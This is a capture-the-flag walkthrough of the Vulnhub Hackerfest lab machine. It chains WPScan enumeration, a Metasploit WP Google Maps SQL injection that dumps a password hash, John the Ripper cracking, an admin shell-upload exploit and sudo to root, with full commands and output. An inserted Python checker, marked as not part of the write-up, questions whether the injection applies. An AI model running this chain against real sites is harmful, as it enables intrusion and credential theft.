Hello friends, it has been a long time since I wrote anything, so I thought we would go through another Vulnhub exercise. In short, today's exercise is called Hackerfest. Hackerfest is an event held every year, and this CTF challenge was released for this year's edition.
You can download the machine from here: CYBSECGROUP
Let's start the machine and begin by discovering it on the network using Angry IP.
After discovering the IP, let's open that IP address (in my case the IP was: 192.168.50.185).
At that IP address we find a WordPress site, so let's start enumeration with WPScan.
The scan result looks as follows:
Code:
┌─[[email protected]]─[/home/z3r0/Downloads]
└──╼ #wpscan --enumerate u,p --url http://192.168.50.185
WordPress Security Scanner by the WPScan Team
Version 3.6.3
Sponsored by Sucuri - https://sucuri.net
@_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_
_______________________________________________________________
[i] Updating the Database ...
[i] Update completed.
[+] URL: http://192.168.50.185/
[+] Started: Thu Oct 31 05:42:39 2019
Interesting Finding(s):
[+] http://192.168.50.185/
| Interesting Entry: Server: Apache/2.4.25 (Debian)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] http://192.168.50.185/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access
[+] http://192.168.50.185/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://192.168.50.185/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] http://192.168.50.185/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.2.3 identified (Insecure, released on 2019-09-05).
| Detected By: Rss Generator (Passive Detection)
| - http://192.168.50.185/?feed=rss2, <generator>https://wordpress.org/?v=5.2.3</generator>
| - http://192.168.50.185/?feed=comments-rss2, <generator>https://wordpress.org/?v=5.2.3</generator>
|
| [!] 6 vulnerabilities identified:
|
| [!] Title: WordPress <= 5.2.3 - Stored XSS in Customizer
| Fixed in: 5.2.4
| References:
| - https://wpvulndb.com/vulnerabilities/9908
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17674
| - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/
| - https://blog.wpscan.org/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html
|
| [!] Title: WordPress <= 5.2.3 - Unauthenticated View Private/Draft Posts
| Fixed in: 5.2.4
| References:
| - https://wpvulndb.com/vulnerabilities/9909
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17671
| - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/
| - https://blog.wpscan.org/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html
| - https://github.com/WordPress/WordPress/commit/f82ed753cf00329a5e41f2cb6dc521085136f308
| - https://0day.work/proof-of-concept-for-wordpress-5-2-3-viewing-unauthenticated-posts/
|
| [!] Title: WordPress <= 5.2.3 - Stored XSS in Style Tags
| Fixed in: 5.2.4
| References:
| - https://wpvulndb.com/vulnerabilities/9910
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17672
| - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/
| - https://blog.wpscan.org/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html
|
| [!] Title: WordPress <= 5.2.3 - JSON Request Cache Poisoning
| Fixed in: 5.2.4
| References:
| - https://wpvulndb.com/vulnerabilities/9911
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17673
| - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/
| - https://github.com/WordPress/WordPress/commit/b224c251adfa16a5f84074a3c0886270c9df38de
| - https://blog.wpscan.org/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html
|
| [!] Title: WordPress <= 5.2.3 - Server-Side Request Forgery (SSRF) in URL Validation
| Fixed in: 5.2.4
| References:
| - https://wpvulndb.com/vulnerabilities/9912
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17669
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17670
| - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/
| - https://github.com/WordPress/WordPress/commit/9db44754b9e4044690a6c32fd74b9d5fe26b07b2
| - https://blog.wpscan.org/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html
|
| [!] Title: WordPress <= 5.2.3 - Admin Referrer Validation
| Fixed in: 5.2.4
| References:
| - https://wpvulndb.com/vulnerabilities/9913
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17675
| - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/
| - https://github.com/WordPress/WordPress/commit/b183fd1cca0b44a92f0264823dd9f22d2fd8b8d0
| - https://blog.wpscan.org/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html
[+] WordPress theme in use: twentyseventeen
| Location: http://192.168.50.185/wp-content/themes/twentyseventeen/
| Latest Version: 2.2 (up to date)
| Last Updated: 2019-05-07T00:00:00.000Z
| Readme: http://192.168.50.185/wp-content/themes/twentyseventeen/README.txt
| Style URL: http://192.168.50.185/wp-content/themes/twentyseventeen/style.css?ver=5.2.3
| Style Name: Twenty Seventeen
| Style URI: https://wordpress.org/themes/twentyseventeen/
| Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Detected By: Css Style (Passive Detection)
|
| Version: 2.2 (80% confidence)
| Detected By: Style (Passive Detection)
| - http://192.168.50.185/wp-content/themes/twentyseventeen/style.css?ver=5.2.3, Match: 'Version: 2.2'
[+] Enumerating Most Popular Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)
[i] Plugin(s) Identified:
[+] wp-google-maps
| Location: http://192.168.50.185/wp-content/plugins/wp-google-maps/
| Last Updated: 2019-10-25T13:36:00.000Z
| [!] The version is out of date, the latest version is 8.0.7
|
| Detected By: Urls In Homepage (Passive Detection)
|
| [!] 4 vulnerabilities identified:
|
| [!] Title: WP Google Maps <= 7.10.41 - Cross-Site Scripting (XSS)
| Fixed in: 7.10.43
| References:
| - https://wpvulndb.com/vulnerabilities/9243
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9912
| - https://security-consulting.icu/blog/2019/02/wordpress-wpgooglemaps-xss/
| - https://lists.openwall.net/full-disclosure/2019/02/05/13
|
| [!] Title: WP Google Maps 7.11.00-7.11.17 - Unauthenticated SQL Injection
| Fixed in: 7.11.18
| References:
| - https://wpvulndb.com/vulnerabilities/9249
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10692
| - https://plugins.trac.wordpress.org/changeset/2061434/wp-google-maps/trunk/includes/class.rest-api.php
|
| [!] Title: WP Google Maps <= 7.11.27 - Admin Settings CSRF
| Fixed in: 7.11.28
| References:
| - https://wpvulndb.com/vulnerabilities/9332
| - https://plugins.trac.wordpress.org/changeset/2099647/wp-google-maps/trunk/legacy-core.php?old=2092302&old_path=wp-google-maps%2Ftrunk%2Flegacy-core.php
|
| [!] Title: WP Google Maps <= 7.11.34 - CSRF to Stored XSS
| Fixed in: 7.11.35
| References:
| - https://wpvulndb.com/vulnerabilities/9442
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14792
| - https://plugins.trac.wordpress.org/changeset/2119722
|
| Version: 7.10.02 (50% confidence)
| Detected By: Readme - ChangeLog Section (Aggressive Detection)
| - http://192.168.50.185/wp-content/plugins/wp-google-maps/readme.txt
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <==> (10 / 10) 100.00% Time: 00:00:00
[i] User(s) Identified:
[+] webmaster
| Detected By: Author Posts - Display Name (Passive Detection)
| Confirmed By:
| Rss Generator (Passive Detection)
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
[+] Finished: Thu Oct 31 05:42:45 2019
[+] Requests Done: 72
[+] Cached Requests: 7
[+] Data Sent: 14.607 KB
[+] Data Received: 26.185 MB
[+] Memory used: 212.352 MB
[+] Elapsed time: 00:00:05
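As an added check (not part of the write-up), here is a small version-range matcher fed with the four wp-google-maps findings exactly as WPScan printed them above. The readme-based detection reported 7.10.02 at only 50% confidence, and that version is outside the 7.11.00-7.11.17 SQL injection window, so a low-confidence version must be confirmed by other means before you rely on it for either attack or patch decisions.

```python
import re
from typing import List, Optional, Tuple

Version = Tuple[int, ...]

# The four wp-google-maps titles as they appear in the WPScan output above.
FINDINGS = [
    "WP Google Maps <= 7.10.41 - Cross-Site Scripting (XSS)",
    "WP Google Maps 7.11.00-7.11.17 - Unauthenticated SQL Injection",
    "WP Google Maps <= 7.11.27 - Admin Settings CSRF",
    "WP Google Maps <= 7.11.34 - CSRF to Stored XSS",
]


def parse_version(text: str) -> Version:
    """'7.10.02' -> (7, 10, 2): numeric compare, so 7.10 sorts after 7.9."""
    return tuple(int(part) for part in text.split("."))


def parse_range(title: str) -> Tuple[Optional[Version], Version]:
    """Inclusive (low, high) bounds from a WPScan title.

    '<= X'  -> (None, X)   every version up to X
    'A-B'   -> (A, B)      only the window A..B
    """
    m = re.search(r"<=\s*([\d.]+)", title)
    if m:
        return None, parse_version(m.group(1))
    m = re.search(r"(\d[\d.]*)-(\d[\d.]*)", title)
    if m:
        return parse_version(m.group(1)), parse_version(m.group(2))
    raise ValueError(f"no version range in title: {title!r}")


def affected(version: str, title: str) -> bool:
    """True if the detected plugin version lies inside the finding's range."""
    low, high = parse_range(title)
    v = parse_version(version)
    return (low is None or low <= v) and v <= high


def applicable_findings(version: str) -> List[str]:
    """Which of the listed findings actually apply to this version."""
    return [title for title in FINDINGS if affected(version, title)]


if __name__ == "__main__":
    for title in applicable_findings("7.10.02"):
        print("applies:", title)
```

For the scanner's 7.10.02 the SQL injection entry is the one finding that does not apply, which is exactly the discrepancy a reviewer should notice before trusting the version string.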
As you can see, the wp-google-maps plugin has an SQL injection that we can use; the enumeration also let us determine the username webmaster.
An exploit for this injection can be found in the Metasploit Framework.
Code:
┌─[[email protected]]─[/home/z3r0/Downloads]
└──╼ #msfconsole
msf5 > use auxiliary/admin/http/wp_google_maps_sqli
msf5 auxiliary(admin/http/wp_google_maps_sqli) > show options
Module options (auxiliary/admin/http/wp_google_maps_sqli):
Name       Current Setting  Required  Description
----       ---------------  --------  -----------
DB_PREFIX  wp_              yes       WordPress table prefix
Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS                      yes       The target address range or CIDR identifier
RPORT      80               yes       The target port (TCP)
SSL        false            no        Negotiate SSL/TLS for outgoing connections
TARGETURI  /                yes       The base path to the wordpress application
VHOST                       no        HTTP server virtual host
msf5 auxiliary(admin/http/wp_google_maps_sqli) > set RHOSTS 192.168.50.185
RHOSTS => 192.168.50.185
msf5 auxiliary(admin/http/wp_google_maps_sqli) > run
[*] Running module against 192.168.50.185
[*] 192.168.50.185:80 - Trying to retrieve the wp_users table...
[+] Credentials saved in: /root/.msf4/loot/20191031062337_default_192.168.50.185_wp_google_maps.j_401116.bin
[+] 192.168.50.185:80 - FoundX webmaster $P$BsqOdiLTcye6AS1ofreys4GzRlRvSr1 [email protected]
[*] Auxiliary module execution completed
msf5 auxiliary(admin/http/wp_google_maps_sqli) > exit
We were able to extract the user's password hash ($P$BsqOdiLTcye6AS1ofreys4GzRlRvSr1), so let's try to crack it.
I will use John the Ripper and the wordlist everybody uses, rockyou.txt.
Let's write the hash into a text file and run the following command:
Code:
┌─[[email protected]]─[~/Desktop]
└──╼ $john --wordlist=./rockyou.txt hash.txt
The password was: kittykat1
Using the password we can open a shell, again with msf.
Code:
msf5 > use exploit/unix/webapp/wp_admin_shell_upload
msf5 exploit(unix/webapp/wp_admin_shell_upload) > set RHOSTS 192.168.50.185
RHOSTS => 192.168.50.185
msf5 exploit(unix/webapp/wp_admin_shell_upload) > set username webmaster
username => webmaster
msf5 exploit(unix/webapp/wp_admin_shell_upload) > set password kittykat1
password => kittykat1
msf5 exploit(unix/webapp/wp_admin_shell_upload) > run
Let's spawn a proper terminal and switch to the webmaster user.
Code:
meterpreter > shell
Process 5440 created.
Channel 2 created.
sh: 0: getcwd() failed: No such file or directory
sh: 0: getcwd() failed: No such file or directory
su webmaster
su: must be run from a terminal
python -c 'import pty;pty.spawn("/bin/bash")'
shell-init: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory
[email protected]:$ su webmaster
su webmaster
Password: kittykat1
shell-init: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory
[email protected]:$
On the server the webmaster user is allowed to run any command with sudo, so privilege escalation is not needed.
Let's open a root shell.
Code:
[email protected]:$ sudo -s
sudo -s
shell-init: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory
[email protected]:.# cd /root
cd /root
chdir: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory
[email protected]:~# ls
ls
flag.txt
[email protected]:~# cat flag.txt
cat flag.txt
3dcdf93d2976321d7a8c47a6bb2d48837d330624
[email protected]:~#
That's all, good luck!